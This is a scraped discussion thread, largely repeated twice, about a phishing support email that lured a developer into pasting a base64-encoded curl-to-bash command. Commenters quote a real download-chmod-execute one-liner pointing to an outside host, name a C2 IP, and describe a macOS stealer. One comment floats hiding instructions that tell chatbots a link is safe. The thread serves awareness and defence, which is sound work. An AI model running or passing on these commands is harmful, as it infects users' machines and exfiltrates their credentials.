Why would you ask ChatGPT to tell you what a base64-encoded string is? Just base64 decode it! This blog post's "investigation" is worthless when it's just copy/pasting what a chat bot said. There is no reason to rely on a chat bot for this.
show comments
nerdsniper
The binary itself appears to be a remote-access trojan and data exfiltration malware for MacOS. It provides a reverse-shell via http://83.219.248.194 and exfiltrates files with the following extensions: txt rtf doc docx xls xlsx key wallet jpg dat pdf pem asc ppk rdp sql ovpn kdbx conf json It looks quite similar to AMOS - Atomic MacOS Stealer.
It also seems to exfiltrate browser session data + cookies, the MacOS keychain database, and all your notes in MacOS Notes.
It's moderately obfuscated, mostly using XOR cipher to obscure data both inside the binary (like that IP address for the C2 server) and also data sent to/from the C2 server.
show comments
hinkley
To me the scariest support email would be discovering that the customer's 'bug' is actually evidence that they are in mortal danger, and not being sure the assailant wasn't reading everything I'm telling the customer.
I thought perhaps this was going that way up until around the echo | bash bit.
I don't think this one is particularly scary. I've brushed much closer to Death even without spear-phishing being involved.
show comments
xg15
I think the first red flag for me would be that the user's reply completely mismatched with what OP wanted to know.
> Can you tell me which Url, your OS, and browser?
Kind regards,
Takuya
> Hey,
Thanks for your previous guidance.
I'm still having trouble with access using the latest version of Firefox on Windows
It's difficult to describe the problem so I've included a screenshot. [...]
Lots of users will ignore requests, but I think very few will make up requests that never happened. OP was asking for information, yet the user makes it sound as if OP had requested him to update the browser. That already makes it sound a lot as if the reply was prewritten and not an actual conversation.
Of course it's not foolproof and a phisher with more resources could have generated the reply dynamically.
show comments
frenchtoast8
I'm seeing a lot more of these phishing links relying on sites.google.com . Users are becoming trained to look at the domain, which appears correct to them. Is it a mistake of Google to continue to let people post user content on a subdomain of their main domain?
show comments
zenmac
Also this git repo[1] that pretend to be an open source MacOS alarm clock dose the same trick. There is no code in git repo. But if you click the "Get Awaken" red button. It has some base64 encoded string which translate to:
The certificate is self-signed. Have not looked into it much, in today's using `curl bashscript` way of installing program exposed another door for attacker to target no tech savvy users.
Why are you relying on fancy autocorrect to "confirm" anything? If anything, ask it how to confirm it yourself.
show comments
ggm
Remember, the mac OSX "brew" webpage has a nice helpful "copy to clipboard" of the modern equivalent of "run this SHAR file" -we've being trained to respect the HTTPS:// label, and then copy-paste-run.
userbinator
Weird already — because my app’s website, https://www.inkdrop.app/, doesn’t even show a cookie consent dialog. I don’t track or serve ads, so there’s no need for that
What I would do in this situation: check to make sure that my site hasn't been hacked, then tell the "user" it's not a problem on my end.
The class names in the source code of the phishing site are... interesting. I've seen this in spam email headers too, and wonder what its purpose is; random alphanumerics are more common and "normal" than random words or word-like phrases. Before anyone suggests it has anything to do with AI, I doubt so as I've noticed its occurrence long before AI.
show comments
epaga
I’ve always wondered why spam and scam emails have been so…dumb and obvious… 99.9% of the time.
It does seem like AI may change this and if even the tech savvier ones among us are able to be duped, then I’m getting worried for people like my parents or less tech savvy friends… we may be in for a scammy next few years.
> Phishing emails disguised as support inquiries are getting more sophisticated, too. They read naturally, but something always feels just a little off — the logic doesn’t quite line up, or the tone feels odd.
The phrase "To better prove you are not a robot" used in this attack is a great example. Easy to glance over if you're reading quickly, but a clear red flag.
show comments
blackjackfoe
I run a small, extremely niche fan site with under 500 users, and I received a very similar email the other day - someone complaining about the "cookie popup" (which my site doesn't have), and then sending me a "screenshot" in a sites.google.com link when I told them I don't know what they're talking about.
Only difference is that it downloaded a .zip file containing a shortcut (.lnk) file which contained commands to download and execute the malicious code.
Sweepi
dont know why a basic phishing attempt w/o any deep analysis and a clickbait title get 200+ points
freitasm
This is similar to compromised sites showing a fake Cloudflare "Prove you are humand by running a command on your computer" dialog.
Just a different way of spreading the malware.
James_K
> as ChatGPT confirmed when I asked it to analyze it:
When I design my fishing links, I'll try to embed instructions for chatbots to suggest they're safe.
singpolyma3
There's nothing here to indicate AI powered spam. It's totally routine kind of phishing
> as ChatGPT confirmed when I asked it to analyze it
Really? you need ChatGPT to help you decode a base64 string into the plain text command it's masking?
Just based on that, I'd question the quality of the app that was targetted and wouldn't really trust it with any data.
lpellis
Pretty clever to host the malware on a sites.google.com domain, makes it look way more trustworthy.
Google should probably stop allowing people to add content under that address.
vivzkestrel
what if we had an online/offline chrome run inside some VM / container that would directly open any links from email everytime you clicked on a link inside email
This is tame and not scary compared to the kinds of real live human social engineering scams I’ve seen especially targeting senior leaders. With those scams there’s a budget for real human scammers.
This thing was a very obvious scam almost immediately. What real customer provides a screenshot with Google sites, captcha, and then asking you to run a terminal program?
Most non-technical users wouldn’t even fall for this because they’d be immediately be scared away with the command line aspect of it.
show comments
root_axis
> My app’s website doesn’t even show a cookie consent dialog, I don’t track or serve ads, so there’s no need for that.
I just want to point out a slight misconception. GDPR tracking consent isn't a question of ads, any manner of user tracking requires explicit consent even if you use it for e.g. internal analytics or serving content based on anonymous user behavior.
show comments
serf
it doesn't feel that scary to me -- it essentially took 5 mistakes to hit the payload. That'd a pretty wide berth as far as phishing attacks go.
netsharc
Geez, I skimmed the image with the "steps" and the devtools next to it and assumed it was steps to get the user to open the DevTools, but later when he said it would download a file I thought "You can tell the DevTools to download a file and execute it as a shell script?!".
Then I read the steps again, step 2 is "Type in 'Terminal'"... oh come on, will many people fall for that?
show comments
jmholla
My standard procedure for copying and pasting commands from a website, is to first run it through `hd` to make sure there's no fuckery with Unicode or escape sequences:
xclip -selection -clipboard -o | hd
From the developer's post, I copied and pasted up to the execution and it was very obvious what the fuckery was as the author found out (xpaste is my paste to stdout alias):
An alternative to this is that the users are getting dumber. If the OP article is anything to go by, I lean towards the latter.
lynx97
Wait...
> echo -n Y3VybCAtc0w... | base64 -d | bash
...
> executes a shell script from a remote server — as ChatGPT confirmed when I asked it to analyze it
You needed ChatGPT for that? Decoding the base64 blob without huring yourself is very easy. I don't know if OP is really a dev or in the support department, but in any case: as a customer, I would be worried. Hint: Just remove the " | bash" and you will easily see what the attacker tried you to make execute.
cmurf
Which is why it's infuriating that health care companies implement secure email by asking the customer to click on a 3rd party link in an email.
An email they're saying is an insecure delivery system.
But we're supposed to click on links in these special emails.
Fuck!
show comments
tantalor
> as ChatGPT confirmed when I asked it to analyze it
lol we are so cooked
show comments
juped
I hope everyone who posts a variation of "someone really fell for phishing? how stupid, I would never fall for phishing" falls for phishing soon.
gokayburuc-dev
As artificial intelligence has evolved, so have hacking techniques. Attacks using techniques like deepfake and phishing have become increasingly prevalent.Multi-layered attacks began to be created.While they impersonate companies in the first layer, they bypass security systems (2FA etc.) in the second layer.
Perhaps those working in the field of artificial intelligence can also make progress in detecting such attacks with artificial intelligence and blocking them before they reach the end user.
wvbdmp
In Windows CMD you don’t even need to hit return at the end. They can just add a line break to the copied text and as soon as you paste into the command line (just a right click!), you own yourself.
I have one question though: Considering the scare-mongering about Windows 10’s EOL, this seems pretty convoluted. I thought bad guys could own your machine by automatic drive-by downloads unless you’re absolutely on the latest versions of everything. What’s with all the “please follow this step-by-step guide to getting hacked”?
Why would you ask ChatGPT to tell you what a base64-encoded string is? Just base64 decode it! This blog post's "investigation" is worthless when it's just copy/pasting what a chat bot said. There is no reason to rely on a chat bot for this.
The binary itself appears to be a remote-access trojan and data exfiltration malware for MacOS. It provides a reverse-shell via http://83.219.248.194 and exfiltrates files with the following extensions: txt rtf doc docx xls xlsx key wallet jpg dat pdf pem asc ppk rdp sql ovpn kdbx conf json It looks quite similar to AMOS - Atomic MacOS Stealer.
It also seems to exfiltrate browser session data + cookies, the MacOS keychain database, and all your notes in MacOS Notes.
It's moderately obfuscated, mostly using XOR cipher to obscure data both inside the binary (like that IP address for the C2 server) and also data sent to/from the C2 server.
To me the scariest support email would be discovering that the customer's 'bug' is actually evidence that they are in mortal danger, and not being sure the assailant wasn't reading everything I'm telling the customer.
I thought perhaps this was going that way up until around the echo | bash bit.
I don't think this one is particularly scary. I've brushed much closer to Death even without spear-phishing being involved.
I think the first red flag for me would be that the user's reply completely mismatched with what OP wanted to know.
> Can you tell me which Url, your OS, and browser? Kind regards, Takuya
> Hey, Thanks for your previous guidance. I'm still having trouble with access using the latest version of Firefox on Windows It's difficult to describe the problem so I've included a screenshot. [...]
Lots of users will ignore requests, but I think very few will make up requests that never happened. OP was asking for information, yet the user makes it sound as if OP had requested him to update the browser. That already makes it sound a lot as if the reply was prewritten and not an actual conversation.
Of course it's not foolproof and a phisher with more resources could have generated the reply dynamically.
I'm seeing a lot more of these phishing links relying on sites.google.com . Users are becoming trained to look at the domain, which appears correct to them. Is it a mistake of Google to continue to let people post user content on a subdomain of their main domain?
Also this git repo[1] that pretend to be an open source MacOS alarm clock dose the same trick. There is no code in git repo. But if you click the "Get Awaken" red button. It has some base64 encoded string which translate to:
https://buildnetcrew.com/curl/e16f01ec9c3f30bc1c4cf56a7109be...' -o /tmp/launch && chmod +x /tmp/launch && /tmp/launch
The certificate is self-signed. Have not looked into it much, in today's using `curl bashscript` way of installing program exposed another door for attacker to target no tech savvy users.
[1]: https://github.com/Awaken-Mac/Awaken
> ChatGPT confirmed
Why are you relying on fancy autocorrect to "confirm" anything? If anything, ask it how to confirm it yourself.
Remember, the mac OSX "brew" webpage has a nice helpful "copy to clipboard" of the modern equivalent of "run this SHAR file" -we've being trained to respect the HTTPS:// label, and then copy-paste-run.
Weird already — because my app’s website, https://www.inkdrop.app/, doesn’t even show a cookie consent dialog. I don’t track or serve ads, so there’s no need for that
What I would do in this situation: check to make sure that my site hasn't been hacked, then tell the "user" it's not a problem on my end.
The class names in the source code of the phishing site are... interesting. I've seen this in spam email headers too, and wonder what its purpose is; random alphanumerics are more common and "normal" than random words or word-like phrases. Before anyone suggests it has anything to do with AI, I doubt so as I've noticed its occurrence long before AI.
I’ve always wondered why spam and scam emails have been so…dumb and obvious… 99.9% of the time.
It does seem like AI may change this and if even the tech savvier ones among us are able to be duped, then I’m getting worried for people like my parents or less tech savvy friends… we may be in for a scammy next few years.
I got one of these too, ostensibly from Cloudflare: https://imgur.com/a/FZM22Lg
This is what it put in my clipboard for me to paste:
> It looked like a Google Drive link
No it didn't. It starts with "sites.google.com"
> Phishing emails disguised as support inquiries are getting more sophisticated, too. They read naturally, but something always feels just a little off — the logic doesn’t quite line up, or the tone feels odd.
The phrase "To better prove you are not a robot" used in this attack is a great example. Easy to glance over if you're reading quickly, but a clear red flag.
I run a small, extremely niche fan site with under 500 users, and I received a very similar email the other day - someone complaining about the "cookie popup" (which my site doesn't have), and then sending me a "screenshot" in a sites.google.com link when I told them I don't know what they're talking about.
Only difference is that it downloaded a .zip file containing a shortcut (.lnk) file which contained commands to download and execute the malicious code.
dont know why a basic phishing attempt w/o any deep analysis and a clickbait title get 200+ points
This is similar to compromised sites showing a fake Cloudflare "Prove you are humand by running a command on your computer" dialog.
Just a different way of spreading the malware.
> as ChatGPT confirmed when I asked it to analyze it:
When I design my fishing links, I'll try to embed instructions for chatbots to suggest they're safe.
There's nothing here to indicate AI powered spam. It's totally routine kind of phishing
the website hosting the malware is.. an indian hose supplier? https://www.amanagencies.com/
Seems like a real company too e.g. https://pdf.indiamart.com/impdf/20303654633/MY-1793705/alumi...
Cloudflare trains users to click on that sort of thing with their wretched Turnstile NotCaptcha. Trained users may also click on:
https://www.securityweek.com/clickfix-attack-exploits-fake-c...
> as ChatGPT confirmed when I asked it to analyze it
Really? you need ChatGPT to help you decode a base64 string into the plain text command it's masking?
Just based on that, I'd question the quality of the app that was targetted and wouldn't really trust it with any data.
Pretty clever to host the malware on a sites.google.com domain, makes it look way more trustworthy. Google should probably stop allowing people to add content under that address.
what if we had an online/offline chrome run inside some VM / container that would directly open any links from email everytime you clicked on a link inside email
Similar MO https://iboostup.com/blog/ai-fake-repositories-github
This is tame and not scary compared to the kinds of real live human social engineering scams I’ve seen especially targeting senior leaders. With those scams there’s a budget for real human scammers.
This thing was a very obvious scam almost immediately. What real customer provides a screenshot with Google sites, captcha, and then asking you to run a terminal program?
Most non-technical users wouldn’t even fall for this because they’d be immediately be scared away with the command line aspect of it.
> My app’s website doesn’t even show a cookie consent dialog, I don’t track or serve ads, so there’s no need for that.
I just want to point out a slight misconception. GDPR tracking consent isn't a question of ads, any manner of user tracking requires explicit consent even if you use it for e.g. internal analytics or serving content based on anonymous user behavior.
it doesn't feel that scary to me -- it essentially took 5 mistakes to hit the payload. That'd a pretty wide berth as far as phishing attacks go.
Geez, I skimmed the image with the "steps" and the devtools next to it and assumed it was steps to get the user to open the DevTools, but later when he said it would download a file I thought "You can tell the DevTools to download a file and execute it as a shell script?!".
Then I read the steps again, step 2 is "Type in 'Terminal'"... oh come on, will many people fall for that?
My standard procedure for copying and pasting commands from a website, is to first run it through `hd` to make sure there's no fuckery with Unicode or escape sequences:
From the developer's post, I copied and pasted up to the execution and it was very obvious what the fuckery was as the author found out (xpaste is my paste to stdout alias):> the attacks are getting smarter.
An alternative to this is that the users are getting dumber. If the OP article is anything to go by, I lean towards the latter.
Wait...
> echo -n Y3VybCAtc0w... | base64 -d | bash ... > executes a shell script from a remote server — as ChatGPT confirmed when I asked it to analyze it
You needed ChatGPT for that? Decoding the base64 blob without huring yourself is very easy. I don't know if OP is really a dev or in the support department, but in any case: as a customer, I would be worried. Hint: Just remove the " | bash" and you will easily see what the attacker tried you to make execute.
Which is why it's infuriating that health care companies implement secure email by asking the customer to click on a 3rd party link in an email.
An email they're saying is an insecure delivery system.
But we're supposed to click on links in these special emails.
Fuck!
> as ChatGPT confirmed when I asked it to analyze it
lol we are so cooked
I hope everyone who posts a variation of "someone really fell for phishing? how stupid, I would never fall for phishing" falls for phishing soon.
As artificial intelligence has evolved, so have hacking techniques. Attacks using techniques like deepfake and phishing have become increasingly prevalent.Multi-layered attacks began to be created.While they impersonate companies in the first layer, they bypass security systems (2FA etc.) in the second layer.
Perhaps those working in the field of artificial intelligence can also make progress in detecting such attacks with artificial intelligence and blocking them before they reach the end user.
In Windows CMD you don’t even need to hit return at the end. They can just add a line break to the copied text and as soon as you paste into the command line (just a right click!), you own yourself.
I have one question though: Considering the scare-mongering about Windows 10’s EOL, this seems pretty convoluted. I thought bad guys could own your machine by automatic drive-by downloads unless you’re absolutely on the latest versions of everything. What’s with all the “please follow this step-by-step guide to getting hacked”?